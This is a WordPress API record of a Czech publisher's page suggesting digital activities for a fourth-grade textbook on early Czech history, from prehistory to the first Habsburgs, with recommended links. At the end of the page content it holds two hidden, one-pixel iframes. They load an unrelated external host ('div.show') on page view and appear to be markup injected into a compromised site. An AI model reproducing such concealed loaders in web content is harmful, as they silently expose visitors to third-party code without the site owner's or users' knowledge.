{"id":20250,"date":"2025-06-16T12:34:28","date_gmt":"2025-06-16T10:34:28","guid":{"rendered":"https:\/\/www.nns.cz\/blog\/?page_id=20250"},"modified":"2025-06-16T12:36:49","modified_gmt":"2025-06-16T10:36:49","slug":"vlastiveda-4-hlavni-udalosti-nejstarsich-ceskych-dejin","status":"publish","type":"page","link":"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/vlastiveda-4-hlavni-udalosti-nejstarsich-ceskych-dejin\/","title":{"rendered":"Vlastiv\u011bda 4: Hlavn\u00ed ud\u00e1losti nejstar\u0161\u00edch \u010desk\u00fdch d\u011bjin"},"content":{"rendered":"<h4 style=\"text-align: right;\"><a href=\"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/\" rel=\"noopener\">zp\u011bt na v\u00fdb\u011br titulu<\/a><\/h4>\n<h3>Vyu\u017eili jste n\u011bkter\u00fd z&nbsp;n\u00e1m\u011bt\u016f ve v\u00fduce, m\u00e1te n\u00e1m\u011bty nebo p\u0159ipom\u00ednky? Kontaktujte n\u00e1s na <a href=\"mailto:digi@nns.cz\">digi@nns.cz<\/a>.<\/h3>\n<p>N\u00e1m\u011bty budou pr\u016fb\u011b\u017en\u011b aktualizov\u00e1ny a&nbsp;vylep\u0161ov\u00e1ny.<\/p>\n<h2>1. MAL\u00c1 KAPITOLA O&nbsp;\u010cASE<\/h2>\n<h3>str. 4<\/h3>\n<p>a) Na str\u00e1nk\u00e1ch <a href=\"https:\/\/www.dejepisne.cz\/test-casova-osa-1-10\/\">https:\/\/www.dejepisne.cz\/test-casova-osa-1-10\/<\/a>si vyzkou\u0161ejte, jak um\u00edte p\u0159i\u0159azovat roky do stolet\u00ed.<\/p>\n<p>b) B\u011bhem v\u00fdlet\u016f po&nbsp;\u010cesku, pop\u0159.&nbsp;b\u011bhem zahrani\u010dn\u00ed dovolen\u00e9, po\u0159i\u010fte fotografie pam\u00e1tek z&nbsp;r\u016fzn\u00fdch obdob\u00ed, zejm\u00e9na staveb (hrad\u016f, kostel\u016f), soch, vyn\u00e1lez\u016f. Na vhodn\u00e9m digit\u00e1ln\u00edm za\u0159\u00edzen\u00ed vytvo\u0159te t\u0159\u00eddn\u00ed fotoalbum, fotografie rozt\u0159i\u010fte do slo\u017eek podle dan\u00e9ho obdob\u00ed (prav\u011bk, st\u0159edov\u011bk atd.) a\u00a0p\u0159ipravte prezentaci. Ka\u017edou fotografii pam\u00e1tky ozna\u010dte jej\u00edm n\u00e1zvem, pop\u0159.\u00a0m\u00edstem, kde se nach\u00e1z\u00ed.<\/p>\n<h2>2.&nbsp;\u010cESK\u00c9 ZEM\u011a V&nbsp;PRAV\u011aKU<\/h2>\n<h3>str.\u00a06<\/h3>\n<p>Na internetu zjist\u011bte v\u00edce informac\u00ed o\u00a0zem\u011bd\u011blstv\u00ed v\u00a0mlad\u0161\u00ed dob\u011b kamenn\u00e9 a\u00a0o\u00a0tom, jak se tenkr\u00e1t jedlo. Ze z\u00edskan\u00fdch informac\u00ed vytvo\u0159te my\u0161lenkovou mapu, k\u00a0tomu m\u016f\u017eete vyu\u017e\u00edt i\u00a0vhodn\u00e9 digit\u00e1ln\u00ed prost\u0159ed\u00ed.<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"http:\/\/www.virtualniarcheologie.cz\/jak-se-zilo-prvnim-zemedelcum\/jak-se-tenkrat\/jak-se-tenkrat-jedlo\/\">http:\/\/www.virtualniarcheologie.cz\/jak-se-zilo-prvnim-zemedelcum\/jak-se-tenkrat\/jak-se-tenkrat-jedlo\/<\/a><br \/>\n<a href=\"https:\/\/edu.ceskatelevize.cz\/video\/7035-zemedelstvi-v-neolitu\">https:\/\/edu.ceskatelevize.cz\/video\/7035-zemedelstvi-v-neolitu<\/a><br \/>\n<a href=\"https:\/\/products.aspose.app\/diagram\/cs\/mindmap\">https:\/\/products.aspose.app\/diagram\/cs\/mindmap<\/a><br \/>\n<a href=\"https:\/\/bubbl.us\/\">https:\/\/bubbl.us\/<\/a><\/p>\n<h3>str.\u00a07<\/h3>\n<p>Na internetu vyhledejte postup v\u00fdroby bronzov\u00fdch p\u0159edm\u011bt\u016f. Ve vhodn\u00e9m digit\u00e1ln\u00ed prost\u0159ed\u00ed (nap\u0159.\u00a0PowerPoint) sami stru\u010dn\u011b popi\u0161te cel\u00fd postup.<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"http:\/\/www.virtualniarcheologie.cz\/hrajte-si\/objevte-postup-vyroby-bronzovych-predmetu\/\">http:\/\/www.virtualniarcheologie.cz\/hrajte-si\/objevte-postup-vyroby-bronzovych-predmetu\/<\/a><br \/>\n<a href=\"https:\/\/www.archeologienadosah.cz\/sites\/default\/files\/zpracovani_kovu_-_bronz_0.pdf\">https:\/\/www.archeologienadosah.cz\/sites\/default\/files\/zpracovani_kovu_-_bronz_0.pdf<\/a><\/p>\n<h3>str.\u00a08<\/h3>\n<p>Na webov\u00fdch str\u00e1nk\u00e1ch\u00a0<a href=\"http:\/\/www.mapy.cz\/\">www.mapy.cz<\/a>\u00a0zjist\u011bte, pobl\u00ed\u017e kter\u00e9 \u0159eky a\u00a0kter\u00e9ho m\u011bsta se nach\u00e1z\u00ed nejv\u011bt\u0161\u00ed keltsk\u00e9 oppidum v\u00a0\u010cR.<\/p>\n<p><u>Doporu\u010den\u00fd zdroj:<br \/>\n<\/u><a href=\"https:\/\/mapy.cz\/zakladni?source=base&amp;id=1914975&amp;x=14.4095033&amp;y=49.9620418&amp;z=18\">https:\/\/mapy.cz\/zakladni?source=base&amp;id=1914975&amp;x=14.4095033&amp;y=49.9620418&amp;z=18<\/a><\/p>\n<h2>4. S\u00c1M\u016eV KMENOV\u00dd SVAZ<\/h2>\n<h3>str.\u00a010<\/h3>\n<p>Na z\u00e1klad\u011b informac\u00ed z\u00a0u\u010debnice a\u00a0dopl\u0148uj\u00edc\u00edch informac\u00ed z\u00a0internetu vytvo\u0159te p\u0159edstaven\u00ed o\u00a0vzniku S\u00e1mova kmenov\u00e9ho svazu. Pomoc\u00ed vhodn\u00e9ho z\u00e1znamov\u00e9ho za\u0159\u00edzen\u00ed (videokamera, chytr\u00fd mobiln\u00ed telefon, \u2026) po\u0159i\u010fte z\u00a0p\u0159edstaven\u00ed videoz\u00e1znam.<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"https:\/\/cs.wikipedia.org\/wiki\/S%C3%A1mova_%C5%99%C3%AD%C5%A1e\">https:\/\/cs.wikipedia.org\/wiki\/S%C3%A1mova_%C5%99%C3%AD%C5%A1e<\/a><br \/>\n<a href=\"https:\/\/www.dejepis.com\/samo\/\">https:\/\/www.dejepis.com\/samo\/<\/a><br \/>\n<a href=\"https:\/\/www.zsuvaly.cz\/userfiles\/files\/DUM\/Samuv_kmenovy_svaz.ppt\">https:\/\/www.zsuvaly.cz\/userfiles\/files\/DUM\/Samuv_kmenovy_svaz.ppt<\/a><\/p>\n<h2>7. VZNIK \u010cESK\u00c9HO ST\u00c1TU, VL\u00c1DA P\u0158EMYSLOVSK\u00ddCH KN\u00cd\u017dAT<\/h2>\n<h3>str.\u00a016<\/h3>\n<p>Vyhledejte sv\u011btozn\u00e1mou koledu o\u00a0sv.\u00a0V\u00e1clavovi. Nau\u010dte se jej\u00ed prvn\u00ed sloku v\u00a0angli\u010dtin\u011b a\u00a0nahrajte se na vhodn\u00e9 z\u00e1znamov\u00e9 za\u0159\u00edzen\u00ed (diktafon, chytr\u00fd mobiln\u00ed telefon).<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"https:\/\/cs.wikipedia.org\/wiki\/Dobr%C3%BD_kr%C3%A1l_V%C3%A1clav\">https:\/\/cs.wikipedia.org\/wiki\/Dobr%C3%BD_kr%C3%A1l_V%C3%A1clav<\/a><br \/>\n<a href=\"https:\/\/www.youtube.com\/watch?v=X69M519dycQ\">https:\/\/www.youtube.com\/watch?v=X69M519dycQ<\/a><br \/>\n<a href=\"https:\/\/www.youtube.com\/watch?v=SQVUMG6LZGM\">https:\/\/www.youtube.com\/watch?v=SQVUMG6LZGM<\/a><br \/>\n<a href=\"https:\/\/www.karaoketexty.cz\/texty-pisni\/vanocni-koledy\/good-king-wenceslas-292969\">https:\/\/www.karaoketexty.cz\/texty-pisni\/vanocni-koledy\/good-king-wenceslas-292969<\/a><br \/>\n<a href=\"https:\/\/www.vira.cz\/texty\/knihovna\/kapitoly\/dobry-kral-vaclav-good-king-wenceslas\">https:\/\/www.vira.cz\/texty\/knihovna\/kapitoly\/dobry-kral-vaclav-good-king-wenceslas<\/a><\/p>\n<h2>9. VZNIK \u010cESK\u00c9HO KR\u00c1LOVSTV\u00cd, VL\u00c1DA P\u0158EMYSLOVSK\u00ddCH KR\u00c1L\u016e<\/h2>\n<h3>str.\u00a022<\/h3>\n<p>Na internetu vyhledejte, kter\u00e1 m\u011bsta byla zalo\u017eena P\u0159emyslem Otakarem II. Pot\u00e9 vyhledejte fotografie n\u011bkter\u00fdch t\u011bchto m\u011bst. Pracujte pouze s\u00a0voln\u00fdmi zdroji fotografi\u00ed. Pomoc\u00ed vhodn\u00e9ho digit\u00e1ln\u00edho za\u0159\u00edzen\u00ed vytvo\u0159te prezentaci.<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"https:\/\/cs.wikipedia.org\/wiki\/P%C5%99emysl_Otakar_II.#M%C4%9Bsta_zalo%C5%BEen%C3%A1_P%C5%99emyslem_Otakarem_II\">https:\/\/cs.wikipedia.org\/wiki\/P%C5%99emysl_Otakar_II.#M%C4%9Bsta_zalo%C5%BEen%C3%A1_P%C5%99emyslem_Otakarem_II<\/a>.<br \/>\n<a href=\"https:\/\/pixabay.com\/cs\/\">https:\/\/pixabay.com\/cs\/<\/a><br \/>\n<a href=\"https:\/\/www.flickr.com\/photos\/tags\/flicker\/\">https:\/\/www.flickr.com\/photos\/tags\/flicker\/<\/a><\/p>\n<h2>10.&nbsp;\u010cESK\u00dd ST\u00c1T ZA VL\u00c1DY LUCEMBURK\u016e<\/h2>\n<h3>str.\u00a025<\/h3>\n<p>Na internetu zjist\u011bte v\u00edce informac\u00ed o\u00a0vl\u00e1d\u011b Karla IV. Ze z\u00edskan\u00fdch informac\u00ed vytvo\u0159te my\u0161lenkovou mapu, k\u00a0tomu m\u016f\u017eete vyu\u017e\u00edt i\u00a0vhodn\u00e9 digit\u00e1ln\u00ed prost\u0159ed\u00ed.<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"https:\/\/karel700.cuni.cz\/KAREL-55.html\">https:\/\/karel700.cuni.cz\/KAREL-55.html<\/a><br \/>\n<a href=\"https:\/\/www.ceskozemepribehu.cz\/karluv-zivot#chapter-02\">https:\/\/www.ceskozemepribehu.cz\/karluv-zivot#chapter-02<\/a><br \/>\n<a href=\"https:\/\/products.aspose.app\/diagram\/cs\/mindmap\">https:\/\/products.aspose.app\/diagram\/cs\/mindmap<\/a><br \/>\n<a href=\"https:\/\/bubbl.us\/\">https:\/\/bubbl.us\/<\/a><\/p>\n<h2>11.&nbsp;\u017dIVOT VE ST\u0158EDOV\u011aKU<\/h2>\n<h3>str.\u00a030<\/h3>\n<p>Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed (nap\u0159.\u00a0Malov\u00e1n\u00ed) nakreslete hrad a\u00a0jeho okol\u00ed, barevn\u011b zv\u00fdrazn\u011bte prvky s\u00a0obrannou funkc\u00ed.<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"https:\/\/cs.wikipedia.org\/wiki\/Obl%C3%A9h%C3%A1n%C3%AD_ve_st%C5%99edov%C4%9Bku\">https:\/\/cs.wikipedia.org\/wiki\/Obl%C3%A9h%C3%A1n%C3%AD_ve_st%C5%99edov%C4%9Bku<\/a><br \/>\n<a href=\"https:\/\/www.ohradech.eu\/zakladni_skladebni_prvky_hradu.html\">https:\/\/www.ohradech.eu\/zakladni_skladebni_prvky_hradu.html<\/a><\/p>\n<h2>12. HUSITSK\u00c9 V\u00c1LKY<\/h2>\n<h3>str.\u00a034<\/h3>\n<p>Na webov\u00fdch str\u00e1nk\u00e1ch s\u00a0mapami vyhledejte Kostnici (Konstanz). Zjist\u011bte, ve kter\u00e9m st\u00e1t\u011b le\u017e\u00ed.<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"https:\/\/www.google.com\/maps\">https:\/\/www.google.com\/maps<\/a><br \/>\n<a href=\"https:\/\/mapy.cz\/zakladni?x=15.6756000&amp;y=49.7195000&amp;z=11\">https:\/\/mapy.cz\/zakladni?x=15.6756000&amp;y=49.7195000&amp;z=11<\/a><\/p>\n<h2>14. PRVN\u00cd HABSBURKOV\u00c9 NA \u010cESK\u00c9M TR\u016eN\u011a<\/h2>\n<h3>str. 42 (portr\u00e9t Rudolfa II. od G. Arcimbolda)<\/h3>\n<p>Na internetu vyhledejte fotografie s\u00a0ovocem a\u00a0zeleninou. Pomoc\u00ed vhodn\u00e9ho digit\u00e1ln\u00edho za\u0159\u00edzen\u00ed vytvo\u0159te kol\u00e1\u017e-portr\u00e9t.<\/p>\n<p><u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u><a href=\"https:\/\/pixabay.com\/cs\/\">https:\/\/pixabay.com\/cs\/<\/a><br \/>\n<a href=\"https:\/\/www.flickr.com\/photos\/tags\/flicker\/\">https:\/\/www.flickr.com\/photos\/tags\/flicker\/<\/a><\/p>\n<h2>OPAKOV\u00c1N\u00cd<\/h2>\n<p>a) Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed vytvo\u0159te prezentaci o&nbsp;v\u00fdznamn\u00fdch panovnick\u00fdch rodech, kter\u00e9 vl\u00e1dly na na\u0161em \u00fazem\u00ed.<br \/>\n<u>Doporu\u010den\u00e9 zdroje:<br \/>\n<\/u>u\u010debnice<br \/>\n<a href=\"https:\/\/cs.wikipedia.org\/wiki\/%C4%8Cesk%C3%A9_kr%C3%A1lovstv%C3%AD\">https:\/\/cs.wikipedia.org\/wiki\/%C4%8Cesk%C3%A9_kr%C3%A1lovstv%C3%AD<\/a><br \/>\n<a href=\"https:\/\/dejepisvkostce.estranky.cz\/clanky\/vladnouci-rody-na-ceskem-trune\/\">https:\/\/dejepisvkostce.estranky.cz\/clanky\/vladnouci-rody-na-ceskem-trune\/<\/a><\/p>\n<p>b) Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed (Word, Excel) vytvo\u0159te tabulku se stru\u010dn\u00fdm p\u0159ehledem charakteristik v\u0161ech stavebn\u00edch sloh\u016f, s&nbsp;nimi\u017e jste se v&nbsp;u\u010debnici sezn\u00e1mili.<\/p>\n<p>c) Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed vytvo\u0159te obecnou \u010dasovou osu z\u00e1kladn\u00edch obdob\u00ed lidsk\u00fdch d\u011bjin. Na internetu vyhledejte, kdy p\u0159ibli\u017en\u011b jednotliv\u00e1 obdob\u00ed prob\u00edhala, a&nbsp;informaci vyu\u017eijte p\u0159i&nbsp;tvorb\u011b \u010dasov\u00e9 osy.<br \/>\n<u>Doporu\u010den\u00e9 zdroje:<\/u><br \/>\n<a href=\"https:\/\/products.aspose.app\/diagram\/cs\/timeline\">https:\/\/products.aspose.app\/diagram\/cs\/timeline<\/a><br \/>\n<a href=\"https:\/\/www.dejepis.com\/ucebnice\/periodizace-dejin\/\">https:\/\/www.dejepis.com\/ucebnice\/periodizace-dejin\/<\/a><br \/>\n<a href=\"https:\/\/www.dejepis.com\/casova-primka\/\">https:\/\/www.dejepis.com\/casova-primka\/<\/a><\/p>\n<h3>Digit\u00e1ln\u00ed kompetence jsou v\u00fdrazn\u011b podporov\u00e1ny tak\u00e9 v\u00a0MIU\u010d+, kde mohou \u017e\u00e1ci vyu\u017e\u00edvat interaktivn\u00ed \u00falohy a&nbsp;z\u00edsk\u00e1vat dopl\u0148uj\u00edc\u00ed informace formou \u00fakol\u016f s\u00a0odkazy na ov\u011b\u0159en\u00e1 videa a&nbsp;texty.<\/h3>\n<p>Prohl\u00e9dn\u011bte si celou u\u010debnici v\u010detn\u011b dopl\u0148kov\u00e9ho obsahu v&nbsp;elekronick\u00e9 verzi MIU\u010d+ na ucebnice-online.cz <a href=\"https:\/\/mediacreator.cz\/mc\/index.php?sellcode=593\" target=\"_blank\" rel=\"noopener\">kliknut\u00edm zde<\/a>.<\/p>\n<h4 style=\"text-align: right;\"><a href=\"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/\" rel=\"noopener\">zp\u011bt na v\u00fdb\u011br titulu<\/a><\/h4>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>zp\u011bt na v\u00fdb\u011br titulu Vyu\u017eili jste n\u011bkter\u00fd z&nbsp;n\u00e1m\u011bt\u016f ve v\u00fduce, m\u00e1te n\u00e1m\u011bty nebo p\u0159ipom\u00ednky? Kontaktujte n\u00e1s na digi@nns.cz. N\u00e1m\u011bty budou pr\u016fb\u011b\u017en\u011b aktualizov\u00e1ny a&nbsp;vylep\u0161ov\u00e1ny. 1. MAL\u00c1 KAPITOLA O&nbsp;\u010cASE str.&nbsp;4 a) Na str\u00e1nk\u00e1ch https:\/\/www.dejepisne.cz\/test-casova-osa-1-10\/si vyzkou\u0161ejte, jak um\u00edte p\u0159i\u0159azovat roky do stolet\u00ed. b) B\u011bhem v\u00fdlet\u016f po&nbsp;\u010cesku, pop\u0159.&nbsp;b\u011bhem zahrani\u010dn\u00ed dovolen\u00e9, po\u0159i\u010fte fotografie pam\u00e1tek z&nbsp;r\u016fzn\u00fdch obdob\u00ed, zejm\u00e9na staveb (hrad\u016f, [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":0,"parent":15791,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-20250","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/20250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/comments?post=20250"}],"version-history":[{"count":6,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/20250\/revisions"}],"predecessor-version":[{"id":20256,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/20250\/revisions\/20256"}],"up":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/15791"}],"wp:attachment":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/media?parent=20250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}